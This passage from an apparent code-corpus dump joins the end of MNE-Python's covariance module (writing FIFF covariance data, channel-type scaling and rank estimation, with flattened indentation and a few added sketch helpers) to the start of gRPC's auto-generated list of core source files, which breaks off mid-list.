logger.info(' Did not find the desired covariance matrix (kind = %d)'
% cov_kind)
return None
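# Illustrative sketch (hypothetical helper, not part of this module's API):
# the FIFF round-trip for a full covariance. ``_write_cov`` below stores only
# the lower triangle; the reader above scatters it back, symmetrizes, and
# halves the diagonal (which was counted twice by ``data + data.T``).
def _sketch_tril_roundtrip():
    import numpy as np
    rng = np.random.RandomState(3)
    A = rng.randn(4, 4)
    C = A.dot(A.T)
    dim = len(C)
    mask = np.tril(np.ones((dim, dim), dtype=bool)) > 0
    vals = C[mask].ravel()        # what the writer stores
    data = np.zeros((dim, dim))   # what the reader reconstructs
    data[mask] = vals
    data = data + data.T
    data.flat[::dim + 1] /= 2.0   # fix the doubled diagonal
    assert np.allclose(data, C)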
def _write_cov(fid, cov):
"""Write a noise covariance matrix."""
start_block(fid, FIFF.FIFFB_MNE_COV)
# Dimensions etc.
write_int(fid, FIFF.FIFF_MNE_COV_KIND, cov['kind'])
write_int(fid, FIFF.FIFF_MNE_COV_DIM, cov['dim'])
if cov['nfree'] > 0:
write_int(fid, FIFF.FIFF_MNE_COV_NFREE, cov['nfree'])
# Channel names
if cov['names'] is not None and len(cov['names']) > 0:
write_name_list(fid, FIFF.FIFF_MNE_ROW_NAMES, cov['names'])
# Data
if cov['diag']:
write_double(fid, FIFF.FIFF_MNE_COV_DIAG, cov['data'])
else:
# Store only lower part of covariance matrix
dim = cov['dim']
        mask = np.tril(np.ones((dim, dim), dtype=bool)) > 0
vals = cov['data'][mask].ravel()
write_double(fid, FIFF.FIFF_MNE_COV, vals)
# Eigenvalues and vectors if present
if cov['eig'] is not None and cov['eigvec'] is not None:
write_float_matrix(fid, FIFF.FIFF_MNE_COV_EIGENVECTORS, cov['eigvec'])
write_double(fid, FIFF.FIFF_MNE_COV_EIGENVALUES, cov['eig'])
# Projection operator
if cov['projs'] is not None and len(cov['projs']) > 0:
_write_proj(fid, cov['projs'])
# Bad channels
if cov['bads'] is not None and len(cov['bads']) > 0:
start_block(fid, FIFF.FIFFB_MNE_BAD_CHANNELS)
write_name_list(fid, FIFF.FIFF_MNE_CH_NAME_LIST, cov['bads'])
end_block(fid, FIFF.FIFFB_MNE_BAD_CHANNELS)
# estimator method
if 'method' in cov:
write_string(fid, FIFF.FIFF_MNE_COV_METHOD, cov['method'])
# negative log-likelihood score
if 'loglik' in cov:
write_double(
fid, FIFF.FIFF_MNE_COV_SCORE, np.array(cov['loglik']))
# Done!
end_block(fid, FIFF.FIFFB_MNE_COV)
def _apply_scaling_array(data, picks_list, scalings):
"""Scale data type-dependently for estimation."""
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
picks_dict = dict(picks_list)
scalings = [(picks_dict[k], v) for k, v in scalings.items()
if k in picks_dict]
for idx, scaling in scalings:
data[idx, :] *= scaling # F - order
else:
data *= scalings[:, np.newaxis] # F - order
def _undo_scaling_array(data, picks_list, scalings):
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
scalings = dict((k, 1. / v) for k, v in scalings.items())
elif isinstance(scalings, np.ndarray):
scalings = 1. / scalings
return _apply_scaling_array(data, picks_list, scalings)
def _apply_scaling_cov(data, picks_list, scalings):
"""Scale resulting data after estimation."""
scalings = _check_scaling_inputs(data, picks_list, scalings)
scales = None
if isinstance(scalings, dict):
n_channels = len(data)
covinds = list(zip(*picks_list))[1]
assert len(data) == sum(len(k) for k in covinds)
assert list(sorted(np.concatenate(covinds))) == list(range(len(data)))
scales = np.zeros(n_channels)
for ch_t, idx in picks_list:
scales[idx] = scalings[ch_t]
elif isinstance(scalings, np.ndarray):
if len(scalings) != len(data):
raise ValueError('Scaling factors and data are of incompatible '
'shape')
scales = scalings
elif scalings is None:
pass
else:
        raise RuntimeError('Scaling factors must be dict, ndarray, or None '
                           '(got %s).' % type(scalings))
if scales is not None:
assert np.sum(scales == 0.) == 0
data *= (scales[None, :] * scales[:, None])
def _undo_scaling_cov(data, picks_list, scalings):
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
scalings = dict((k, 1. / v) for k, v in scalings.items())
elif isinstance(scalings, np.ndarray):
scalings = 1. / scalings
return _apply_scaling_cov(data, picks_list, scalings)
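# Illustrative sketch (hypothetical helper, not part of this module's API):
# the scaling helpers above are exact inverses of one another. Scaling a
# covariance by factors s multiplies entry (i, j) by s_i * s_j, so applying
# the reciprocal factors restores the original matrix up to floating-point
# rounding.
def _sketch_scaling_roundtrip():
    import numpy as np
    rng = np.random.RandomState(4)
    C = rng.randn(3, 3)
    C = C.dot(C.T)
    scales = np.array([1e12, 1e11, 1e5])
    C_scaled = C * (scales[None, :] * scales[:, None])
    C_back = C_scaled * ((1. / scales)[None, :] * (1. / scales)[:, None])
    assert np.allclose(C_back, C)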
def _check_scaling_inputs(data, picks_list, scalings):
"""Aux function."""
rescale_dict_ = dict(mag=1e15, grad=1e13, eeg=1e6)
scalings_ = None
if isinstance(scalings, string_types) and scalings == 'norm':
scalings_ = 1. / _compute_row_norms(data)
elif isinstance(scalings, dict):
rescale_dict_.update(scalings)
scalings_ = rescale_dict_
elif isinstance(scalings, np.ndarray):
scalings_ = scalings
elif scalings is None:
pass
else:
raise NotImplementedError("No way! That's not a rescaling "
'option: %s' % scalings)
return scalings_
def _estimate_rank_meeg_signals(data, info, scalings, tol=1e-4,
return_singular=False, copy=True):
"""Estimate rank for M/EEG data.
Parameters
----------
data : np.ndarray of float, shape(n_channels, n_samples)
The M/EEG signals.
info : mne.io.measurement_info.Info
        The measurement info.
scalings : dict | 'norm' | np.ndarray | None
The rescaling method to be applied. If dict, it will override the
following default dict:
dict(mag=1e15, grad=1e13, eeg=1e6)
If 'norm' data will be scaled by channel-wise norms. If array,
pre-specified norms will be used. If None, no scaling will be applied.
return_singular : bool
If True, also return the singular values that were used
to determine the rank.
copy : bool
If False, values in data will be modified in-place during
rank estimation (saves memory).
Returns
-------
rank : int
Estimated rank of the data.
s : array
If return_singular is True, the singular values that were
thresholded to determine the rank are also returned.
"""
picks_list = _picks_by_type(info)
_apply_scaling_array(data, picks_list, scalings)
    if data.shape[1] < data.shape[0]:
        warnings.warn("You've got fewer samples than channels; the "
                      "rank estimate might be inaccurate.")
out = estimate_rank(data, tol=tol, norm=False,
return_singular=return_singular, copy=copy)
rank = out[0] if isinstance(out, tuple) else out
ch_type = ' + '.join(list(zip(*picks_list))[0])
logger.info('estimated rank (%s): %d' % (ch_type, rank))
_undo_scaling_array(data, picks_list, scalings)
return out
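# Illustrative sketch (hypothetical helper, not part of this module's API):
# the thresholding idea behind ``estimate_rank``: after rescaling, singular
# values below ``tol`` times the largest one are treated as numerically
# zero. (The exact cutoff used by ``estimate_rank`` may differ; this shows
# the principle.)
def _sketch_rank_estimate(tol=1e-4):
    import numpy as np
    rng = np.random.RandomState(5)
    data = rng.randn(6, 500)
    data[-1] = data[0] + data[1]  # one channel is linearly dependent
    s = np.linalg.svd(data, compute_uv=False)
    rank = int(np.sum(s > tol * s[0]))
    assert rank == 5
    return rank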
def _estimate_rank_meeg_cov(data, info, scalings, tol=1e-4,
return_singular=False, copy=True):
"""Estimate rank for M/EEG data.
Parameters
----------
data : np.ndarray of float, shape (n_channels, n_channels)
The M/EEG covariance.
info : mne.io.measurement_info.Info
        The measurement info.
scalings : dict | 'norm' | np.ndarray | None
The rescaling method to be applied. If dict, it will override the
following default dict:
dict(mag=1e12, grad=1e11, eeg=1e5)
If 'norm' data will be scaled by channel-wise norms. If array,
pre-specified norms will be used. If None, no scaling will be applied.
return_singular : bool
If True, also return the singular values that were used
to determine the rank.
copy : bool
If False, values in data will be modified in-place during
rank estimation (saves memory).
Returns
-------
rank : int
Estimated rank of the data.
s : array
If return_singular is True, the singular values that were
thresholded to determine the rank are also returned.
"""
picks_list = _picks_by_type(info)
scalings = _handle_default('scalings_cov_rank', scalings)
_apply_scaling_cov(data, picks_list, scalings)
    if data.shape[1] < data.shape[0]:
        warnings.warn("You've got fewer samples than channels; the "
                      "rank estimate might be inaccurate.")
out = estimate_rank(data, tol=tol, norm=False,
return_singular=return_singular, copy=copy)
rank = out[0] if isinstance(out, tuple) else out
ch_type = ' + '.join(list(zip(*picks_list))[0])
logger.info('estimated rank (%s): %d' % (ch_type, rank))
_undo_scaling_cov(data, picks_list, scalings)
return out
| andyh616/mne-python | mne/cov.py | Python | bsd-3-clause | 70,741 | ["Gaussian"] | 12f1db2da3b39d57290a3581ab5b46ad6487c386fb179ec6b5f19233c1060573 |
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# AUTO-GENERATED FROM `$REPO_ROOT/templates/src/python/grpcio/grpc_core_dependencies.py.template`!!!
CORE_SOURCE_FILES = [
'src/core/ext/filters/census/grpc_context.cc',
'src/core/ext/filters/client_channel/backend_metric.cc',
'src/core/ext/filters/client_channel/backup_poller.cc',
'src/core/ext/filters/client_channel/channel_connectivity.cc',
'src/core/ext/filters/client_channel/client_channel.cc',
'src/core/ext/filters/client_channel/client_channel_channelz.cc',
'src/core/ext/filters/client_channel/client_channel_factory.cc',
'src/core/ext/filters/client_channel/client_channel_plugin.cc',
'src/core/ext/filters/client_channel/config_selector.cc',
'src/core/ext/filters/client_channel/dynamic_filters.cc',
'src/core/ext/filters/client_channel/global_subchannel_pool.cc',
'src/core/ext/filters/client_channel/health/health_check_client.cc',
'src/core/ext/filters/client_channel/http_connect_handshaker.cc',
'src/core/ext/filters/client_channel/http_proxy.cc',
'src/core/ext/filters/client_channel/lb_policy.cc',
'src/core/ext/filters/client_channel/lb_policy/address_filtering.cc',
'src/core/ext/filters/client_channel/lb_policy/child_policy_handler.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/client_load_reporting_filter.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_balancer_addresses.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_channel_secure.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_client_stats.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/load_balancer_api.cc',
'src/core/ext/filters/client_channel/lb_policy/pick_first/pick_first.cc',
'src/core/ext/filters/client_channel/lb_policy/priority/priority.cc',
'src/core/ext/filters/client_channel/lb_policy/ring_hash/ring_hash.cc',
'src/core/ext/filters/client_channel/lb_policy/rls/rls.cc',
'src/core/ext/filters/client_channel/lb_policy/round_robin/round_robin.cc',
'src/core/ext/filters/client_channel/lb_policy/weighted_target/weighted_target.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/cds.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_impl.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_manager.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_resolver.cc',
'src/core/ext/filters/client_channel/lb_policy_registry.cc',
'src/core/ext/filters/client_channel/local_subchannel_pool.cc',
'src/core/ext/filters/client_channel/proxy_mapper_registry.cc',
'src/core/ext/filters/client_channel/resolver/binder/binder_resolver.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/dns_resolver_ares.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_event_engine.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_posix.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_windows.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_event_engine.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_posix.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_windows.cc',
'src/core/ext/filters/client_channel/resolver/dns/dns_resolver_selection.cc',
'src/core/ext/filters/client_channel/resolver/dns/native/dns_resolver.cc',
'src/core/ext/filters/client_channel/resolver/fake/fake_resolver.cc',
'src/core/ext/filters/client_channel/resolver/google_c2p/google_c2p_resolver.cc',
'src/core/ext/filters/client_channel/resolver/sockaddr/sockaddr_resolver.cc',
'src/core/ext/filters/client_channel/resolver/xds/xds_resolver.cc',
'src/core/ext/filters/client_channel/resolver_result_parsing.cc',
'src/core/ext/filters/client_channel/retry_filter.cc',
'src/core/ext/filters/client_channel/retry_service_config.cc',
'src/core/ext/filters/client_channel/retry_throttle.cc',
'src/core/ext/filters/client_channel/service_config_channel_arg_filter.cc',
'src/core/ext/filters/client_channel/subchannel.cc',
'src/core/ext/filters/client_channel/subchannel_pool_interface.cc',
'src/core/ext/filters/client_idle/client_idle_filter.cc',
'src/core/ext/filters/client_idle/idle_filter_state.cc',
'src/core/ext/filters/deadline/deadline_filter.cc',
'src/core/ext/filters/fault_injection/fault_injection_filter.cc',
'src/core/ext/filters/fault_injection/service_config_parser.cc',
'src/core/ext/filters/http/client/http_client_filter.cc',
'src/core/ext/filters/http/client_authority_filter.cc',
'src/core/ext/filters/http/http_filters_plugin.cc',
'src/core/ext/filters/http/message_compress/message_compress_filter.cc',
'src/core/ext/filters/http/message_compress/message_decompress_filter.cc',
'src/core/ext/filters/http/server/http_server_filter.cc',
'src/core/ext/filters/max_age/max_age_filter.cc',
'src/core/ext/filters/message_size/message_size_filter.cc',
'src/core/ext/filters/rbac/rbac_filter.cc',
'src/core/ext/filters/rbac/rbac_service_config_parser.cc',
'src/core/ext/filters/server_config_selector/server_config_selector.cc',
'src/core/ext/filters/server_config_selector/server_config_selector_filter.cc',
'src/core/ext/transport/chttp2/alpn/alpn.cc',
'src/core/ext/transport/chttp2/client/chttp2_connector.cc',
'src/core/ext/transport/chttp2/client/insecure/channel_create.cc',
'src/core/ext/transport/chttp2/client/insecure/channel_create_posix.cc',
'src/core/ext/transport/chttp2/client/secure/secure_channel_create.cc',
'src/core/ext/transport/chttp2/server/chttp2_server.cc',
'src/core/ext/transport/chttp2/server/insecure/server_chttp2.cc',
'src/core/ext/transport/chttp2/server/insecure/server_chttp2_posix.cc',
'src/core/ext/transport/chttp2/server/secure/server_secure_chttp2.cc',
'src/core/ext/transport/chttp2/transport/bin_decoder.cc',
'src/core/ext/transport/chttp2/transport/bin_encoder.cc',
'src/core/ext/transport/chttp2/transport/chttp2_plugin.cc',
'src/core/ext/transport/chttp2/transport/chttp2_transport.cc',
'src/core/ext/transport/chttp2/transport/context_list.cc',
'src/core/ext/transport/chttp2/transport/flow_control.cc',
'src/core/ext/transport/chttp2/transport/frame_data.cc',
'src/core/ext/transport/chttp2/transport/frame_goaway.cc',
'src/core/ext/transport/chttp2/transport/frame_ping.cc',
'src/core/ext/transport/chttp2/transport/frame_rst_stream.cc',
'src/core/ext/transport/chttp2/transport/frame_settings.cc',
'src/core/ext/transport/chttp2/transport/frame_window_update.cc',
'src/core/ext/transport/chttp2/transport/hpack_encoder.cc',
'src/core/ext/transport/chttp2/transport/hpack_encoder_table.cc',
'src/core/ext/transport/chttp2/transport/hpack_parser.cc',
'src/core/ext/transport/chttp2/transport/hpack_parser_table.cc',
'src/core/ext/transport/chttp2/transport/http2_settings.cc',
'src/core/ext/transport/chttp2/transport/huffsyms.cc',
'src/core/ext/transport/chttp2/transport/parsing.cc',
'src/core/ext/transport/chttp2/transport/stream_lists.cc',
'src/core/ext/transport/chttp2/transport/stream_map.cc',
'src/core/ext/transport/chttp2/transport/varint.cc',
'src/core/ext/transport/chttp2/transport/writing.cc',
'src/core/ext/transport/inproc/inproc_plugin.cc',
'src/core/ext/transport/inproc/inproc_transport.cc',
'src/core/ext/upb-generated/envoy/admin/v3/certs.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/clusters.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/config_dump.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/init_dump.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/listeners.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/memory.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/metrics.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/mutex_stats.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/server_info.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/tap.upb.c',
'src/core/ext/upb-generated/envoy/annotations/deprecation.upb.c',
'src/core/ext/upb-generated/envoy/annotations/resource.upb.c',
'src/core/ext/upb-generated/envoy/config/accesslog/v3/accesslog.upb.c',
'src/core/ext/upb-generated/envoy/config/bootstrap/v3/bootstrap.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/circuit_breaker.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/cluster.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/filter.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/outlier_detection.upb.c',
'src/core/ext/upb-generated/envoy/config/common/matcher/v3/matcher.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/address.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/backoff.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/base.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/config_source.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/event_service_config.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/extension.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/grpc_method_list.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/grpc_service.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/health_check.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/http_uri.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/protocol.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/proxy_protocol.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/resolver.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/socket_option.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/substitution_format_string.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/udp_socket_config.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/endpoint.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/endpoint_components.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/load_report.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/api_listener.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/listener.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/listener_components.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/quic_config.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/udp_listener_config.upb.c',
'src/core/ext/upb-generated/envoy/config/metrics/v3/metrics_service.upb.c',
'src/core/ext/upb-generated/envoy/config/metrics/v3/stats.upb.c',
'src/core/ext/upb-generated/envoy/config/overload/v3/overload.upb.c',
'src/core/ext/upb-generated/envoy/config/rbac/v3/rbac.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/route.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/route_components.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/scoped_route.upb.c',
'src/core/ext/upb-generated/envoy/config/tap/v3/common.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/datadog.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/dynamic_ot.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/http_tracer.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/lightstep.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/opencensus.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/service.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/skywalking.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/trace.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/xray.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/zipkin.upb.c',
'src/core/ext/upb-generated/envoy/extensions/clusters/aggregate/v3/cluster.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/common/fault/v3/fault.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/fault/v3/fault.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/rbac/v3/rbac.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/router/v3/router.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/network/http_connection_manager/v3/http_connection_manager.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/cert.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/common.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/secret.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/tls.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/tls_spiffe_validator_config.upb.c',
'src/core/ext/upb-generated/envoy/service/discovery/v3/ads.upb.c',
'src/core/ext/upb-generated/envoy/service/discovery/v3/discovery.upb.c',
'src/core/ext/upb-generated/envoy/service/load_stats/v3/lrs.upb.c',
'src/core/ext/upb-generated/envoy/service/status/v3/csds.upb.c',
'src/core/ext/upb-generated/envoy/type/http/v3/cookie.upb.c',
'src/core/ext/upb-generated/envoy/type/http/v3/path_transformation.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/http_inputs.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/metadata.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/node.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/number.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/path.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/regex.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/string.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/struct.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/value.upb.c',
'src/core/ext/upb-generated/envoy/type/metadata/v3/metadata.upb.c',
'src/core/ext/upb-generated/envoy/type/tracing/v3/custom_tag.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/hash_policy.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/http.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/http_status.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/percent.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/range.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/ratelimit_unit.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/semantic_version.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/token_bucket.upb.c',
'src/core/ext/upb-generated/google/api/annotations.upb.c',
'src/core/ext/upb-generated/google/api/expr/v1alpha1/checked.upb.c',
'src/core/ext/upb-generated/google/api/expr/v1alpha1/syntax.upb.c',
'src/core/ext/upb-generated/google/api/http.upb.c',
'src/core/ext/upb-generated/google/api/httpbody.upb.c',
'src/core/ext/upb-generated/google/protobuf/any.upb.c',
'src/core/ext/upb-generated/google/protobuf/descriptor.upb.c',
'src/core/ext/upb-generated/google/protobuf/duration.upb.c',
'src/core/ext/upb-generated/google/protobuf/empty.upb.c',
'src/core/ext/upb-generated/google/protobuf/struct.upb.c',
'src/core/ext/upb-generated/google/protobuf/timestamp.upb.c',
'src/core/ext/upb-generated/google/protobuf/wrappers.upb.c',
'src/core/ext/upb-generated/google/rpc/status.upb.c',
'src/core/ext/upb-generated/opencensus/proto/trace/v1/trace_config.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/altscontext.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/handshaker.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/transport_security_common.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/health/v1/health.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/lb/v1/load_balancer.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/lookup/v1/rls.upb.c',
'src/core/ext/upb-generated/udpa/annotations/migrate.upb.c',
'src/core/ext/upb-generated/udpa/annotations/security.upb.c',
'src/core/ext/upb-generated/udpa/annotations/sensitive.upb.c',
'src/core/ext/upb-generated/udpa/annotations/status.upb.c',
'src/core/ext/upb-generated/udpa/annotations/versioning.upb.c',
'src/core/ext/upb-generated/validate/validate.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/migrate.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/security.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/sensitive.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/status.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/versioning.upb.c',
'src/core/ext/upb-generated/xds/core/v3/authority.upb.c',
'src/core/ext/upb-generated/xds/core/v3/collection_entry.upb.c',
'src/core/ext/upb-generated/xds/core/v3/context_params.upb.c',
'src/core/ext/upb-generated/xds/core/v3/extension.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource_locator.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource_name.upb.c',
'src/core/ext/upb-generated/xds/data/orca/v3/orca_load_report.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/matcher.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/regex.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/string.upb.c',
'src/core/ext/upb-generated/xds/type/v3/typed_struct.upb.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/certs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/clusters.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/config_dump.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/init_dump.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/listeners.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/memory.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/metrics.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/mutex_stats.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/server_info.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/tap.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/annotations/deprecation.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/annotations/resource.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/accesslog/v3/accesslog.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/bootstrap/v3/bootstrap.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/circuit_breaker.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/cluster.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/filter.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/outlier_detection.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/common/matcher/v3/matcher.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/address.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/backoff.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/base.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/config_source.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/event_service_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/extension.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/grpc_method_list.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/grpc_service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/health_check.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/http_uri.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/protocol.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/proxy_protocol.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/resolver.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/socket_option.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/substitution_format_string.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/udp_socket_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/endpoint.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/endpoint_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/load_report.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/api_listener.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/listener.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/listener_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/quic_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/udp_listener_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/metrics/v3/metrics_service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/metrics/v3/stats.upbdefs.c',
